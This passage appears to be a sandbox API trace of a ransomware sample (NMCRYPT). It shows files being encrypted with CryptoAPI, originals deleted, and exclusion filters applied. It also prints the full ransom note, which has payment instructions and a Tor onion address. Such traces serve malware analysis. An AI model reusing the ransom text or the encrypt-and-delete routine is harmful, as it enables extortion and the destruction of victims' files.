pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.307] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.308] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.309] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0157.309] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.309] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0157.309] CryptCreateHash (in: hProv=0x8e3bb0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0157.309] CryptHashData (hHash=0x9ad478, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0157.309] CryptDeriveKey (in: hProv=0x8e3bb0, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad5b8) returned 1 [0157.309] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0157.309] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0157.309] wcslen (_String="\\\\?\\") returned 0x4 [0157.310] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad338) returned 1 [0157.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0157.310] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0157.310] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=737) returned 1 [0157.310] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0157.311] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.312] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.312] GetLastError () returned 0x0 [0157.312] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.457] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0157.457] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 [0157.457] GetLastError () returned 0x0 [0157.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0x100, lpOverlapped=0x0) returned 1 [0157.457] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0xe1, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0xe1, lpOverlapped=0x0) returned 1 [0157.457] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xe1, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0xf0) returned 1 [0157.457] GetLastError () returned 0x0 [0157.457] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7dc7c*=0xf0, lpOverlapped=0x0) returned 1 [0157.457] ReadFile (in: hFile=0x1624, lpBuffer=0x607e60, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesRead=0x2d7dc80*=0x0, lpOverlapped=0x0) returned 1 [0157.458] WriteFile (in: hFile=0x588, lpBuffer=0x607e60*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x607e60*, lpNumberOfBytesWritten=0x2d7dc7c*=0x0, lpOverlapped=0x0) returned 1 [0157.458] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml")) returned 0x20 [0157.458] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml", dwFileAttributes=0x20) returned 0 [0157.458] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned 1 [0157.458] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml")) returned 0 [0157.458] wcscpy (in: _Dest=0x2d7d7d4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" [0157.458] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui") returned 1 [0157.458] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7d9dc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xXDA51.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xxda51.tmp")) returned 0xda51 [0157.460] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xXDA51.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xxda51.tmp"), dwFlags=0x1) returned 0 [0157.460] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xXDA51.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\.xxda51.tmp")) returned 1 [0157.461] CryptDestroyKey (hKey=0x9ad338) returned 1 [0157.461] wcslen (_String="OK") returned 0x2 [0157.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.461] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.461] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0157.461] CryptDestroyHash (hHash=0x9ad478) returned 1 [0157.461] CryptReleaseContext (hProv=0x8e3bb0, dwFlags=0x0) returned 1 [0157.461] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0 [0157.461] GetLastError () returned 0x12 [0157.461] FindClose (in: hFindFile=0x9ad7f8 | out: hFindFile=0x9ad7f8) returned 1 [0157.461] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0157.461] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.462] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0157.462] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0157.462] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.462] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.462] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0157.462] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.462] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.exe") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.dll") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.lnk") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.bat") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.ini") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.msi") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*.scf") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*pagefile.sys*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*NTUSER.DAT*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*AppData*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\winrar\\*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\java\\*") returned 0 [0157.462] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\windows\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\ESET\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\AVG\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\AVIRA\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*Atheros*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*Realtek*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*bootmgr*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*boot*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*boot*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*CONFIG.SYS*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*IO.SYS*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*MSDOS.SYS*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*NTDETECT.COM*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*ntldr*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*chrome*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*opera*") returned 0 [0157.463] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", pszSpec="*firefox*") returned 0 [0157.463] wcslen (_String="\\\\?\\") returned 0x4 [0157.463] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\*", lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 0x9ad2f8 [0157.463] wcscmp (_String1=".", _String2=".") returned 0 [0157.463] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.463] wcscmp (_String1="..", _String2=".") returned 1 [0157.463] wcscmp (_String1="..", _String2="..") returned 0 [0157.463] FindNextFileW (in: hFindFile=0x9ad2f8, lpFindFileData=0x2d7dedc | out: lpFindFileData=0x2d7dedc) returned 1 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*NMCRYPT") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*Recovers your files.html") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.exe") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.dll") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.lnk") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.bat") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.ini") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.msi") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*.scf") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*pagefile.sys*") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*NTUSER.DAT*") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*AppData*") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\winrar\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0157.463] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\java\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\windows\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\ESET\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\AVG\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\AVIRA\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*Atheros*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*Realtek*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*bootmgr*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*boot*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*boot*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*CONFIG.SYS*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*IO.SYS*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*MSDOS.SYS*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*NTDETECT.COM*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*ntldr*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*chrome*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*opera*") returned 0 [0157.464] PathMatchSpecW (pszFile="oskmenubase.xml", pszSpec="*firefox*") returned 0 [0157.464] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml", pszSpec="*") returned 1 [0157.464] strlen (_Str="NMoreira") returned 0x8 [0157.464] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 